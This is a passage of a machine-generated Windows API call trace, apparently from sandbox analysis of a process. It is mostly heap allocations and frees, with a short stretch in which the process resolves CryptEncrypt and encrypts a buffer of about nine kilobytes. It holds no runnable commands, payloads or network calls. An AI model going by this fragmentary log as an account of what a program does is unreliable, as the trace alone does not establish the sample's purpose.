lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0225.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0225.802] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0225.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0225.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0225.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0225.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0225.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0225.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0225.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0225.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0225.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0225.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0225.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0225.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0225.802] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0225.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0225.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0225.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0225.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0225.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0225.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0225.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0225.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0225.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0225.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0225.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0225.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0225.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0225.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0225.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0225.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0225.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0225.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0225.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0225.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0225.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0225.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0225.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0225.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0225.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0225.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0225.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0225.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0225.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0225.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0225.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2317) returned 0x2f14818 [0225.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0225.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0225.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0225.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0225.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0225.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56588 [0225.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0225.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0225.805] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0225.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0225.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0225.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0225.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0225.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0225.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0225.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0225.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0225.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0225.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0225.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0225.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0225.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0225.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0225.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0225.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0225.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0225.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0225.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0225.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0225.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0225.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0225.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0225.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0225.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0225.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0225.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0225.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0225.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0225.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0225.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0225.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0225.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0225.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0225.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0225.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0225.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0225.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0225.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0225.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0225.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0225.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0225.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0225.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0225.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0225.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0225.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0225.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0225.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0225.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0225.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0225.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0225.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0225.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0225.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0225.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0225.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0225.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0225.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0225.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e515b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0225.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0225.808] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0225.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0225.808] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0225.808] CryptEncrypt (in: hKey=0xa87550, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x2317, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x2318) returned 1 [0225.808] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.808] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0225.809] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.809] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.809] CharLowerBuffW (in: lpsz="byte[8984]", cchLength=0xa | out: lpsz="byte[8984]") returned 0xa [0225.809] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.809] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0225.809] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0225.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0225.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0225.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0225.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0225.809] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0225.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0225.809] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0225.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0225.809] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0225.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0225.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0225.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0225.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0225.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0225.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0225.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0225.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0225.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0225.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0225.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0225.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0225.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0225.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0225.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0225.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0225.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0225.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0225.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0225.811] RtlAllocateHeap (HeapHandle=0x970000, 